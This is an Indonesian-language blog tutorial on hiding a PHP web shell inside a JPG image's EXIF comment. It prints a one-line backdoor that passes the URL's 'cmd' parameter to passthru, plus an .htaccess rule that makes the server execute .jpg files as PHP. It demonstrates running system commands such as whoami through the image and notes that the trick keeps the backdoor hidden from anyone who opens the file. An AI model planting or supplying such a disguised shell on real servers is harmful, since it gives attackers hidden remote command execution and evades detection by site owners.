Menyembunyikan File PHP Kedalam File JPG

Ditulisan kali ini saya akan membahas bagaimana sebuah teknik steganografi dapat digunakan untuk menyembunyikan perintah php dalam sebuah gambar jpg dan dapat dijalankan walaupun ekstensi file tersebut tidak diubah. penasaran bukan ? file berformat .jpg ternyata dapat melakukan perintah file PHP.

Table of Contents

• Bahan - Bahan
• Mulai Eksekusi

---

Mungkin dari beberapa pembaca blog ini ada yang belum mengetahui teknik ini, sebenarnya teknik ini sudah banyak beredar di internet, namun saya mencoba menjelaskan menggunakan versi saya sendiri. Inti dari tulisan ini bukan untuk menggurui namun karena saya ingin berbagi pengetahuan, jadi jika ada yang kurang mohon dimaklumi.

Bahan - Bahan

---

---

Perlengkapan yang dibutuhkan oleh kita yaitu :

• Teks editor (Notepad / Notepad++ / lain-lain)
• File gambar yang akan dimasukan perintah PHP
• Exif Editor, pada bahasan ini saya menggunakan exif editor dari colorpilot
• XAMPP / LAMPP / Server

Mulai Eksekusi

Setelah bahan-bahan disiapkan, selanjutnya kita mulai pada tahap pertama yaitu,

Buka aplikasi exif editor

Lalu pilih file gambar yang akan digunakan untuk menyembunyikan perintah PHP. Disini saya menggunakan file bernama kakashi.jpg.

Double Click pada file gambar yang akan kita gunakan.

Dan tampilan aplikasi exif editor pun memunculkan menu, kita pilih kolom Comment. isi kolom Comment dengan perintah PHP.

Perintah PHP

<?php passthru(isset($_GET['cmd']) ? $_GET['cmd'] : "echo ''"); __halt_compiler();

Klik OK

Tahap selanjutnya simpan file gambar tersebut pada server, disini saya menggunakan server localhost.

Lalu tambahkan file .htaccess dan isikan tulisan dibawah ini.

.htaccess

AddType application/x-httpd-php .jpg

fungsi nya untuk meng-override sistem, jika file ber-ekstensi .jpg dapat dijalankan menggunakan compiler PHP.

sebelum menambahkan file .htaccess

sesudah menambahkan file .htaccess

“Lho? kok kosong? Mana fungsi PHPnya?”, tunggu dulu hehe, disini kita kurang menambahkan parameter cmd. “Kenapa parameter cmd?”, jadi berdasarkan kode dibawah ini, kita memerlukan parameter cmd, “kenapa perlu menggunakan parameter cmd?”, guna nya agar menyembunyikan fungsi yang kita tambahkan pada file gambar tersebut, jadi jika ada orang yang membuka file kita, maka yang dilihat hanya tulisan tidak jelas seperti gambar diatas.

Perintah PHP

<?php passthru(isset($_GET['cmd']) ? $_GET['cmd'] : "echo ''"); __halt_compiler();

Kita coba menambahkan parameter cmd, daaaaaan….

Taraaaaaangg….!!, akhirnya kita dapat menjalankan perintah PHP melalui file gambar menggunakan command whoami, terdengar seperti hekeur bukan ? hahahaha

kita coba menggunakan fungsi lain, seperti command dir

Begitulah cara menyembunyikan perintah PHP kedalam sebuah gambar, silahkan berkomentar jika ada yang masih membingungkan.

Terimakasih.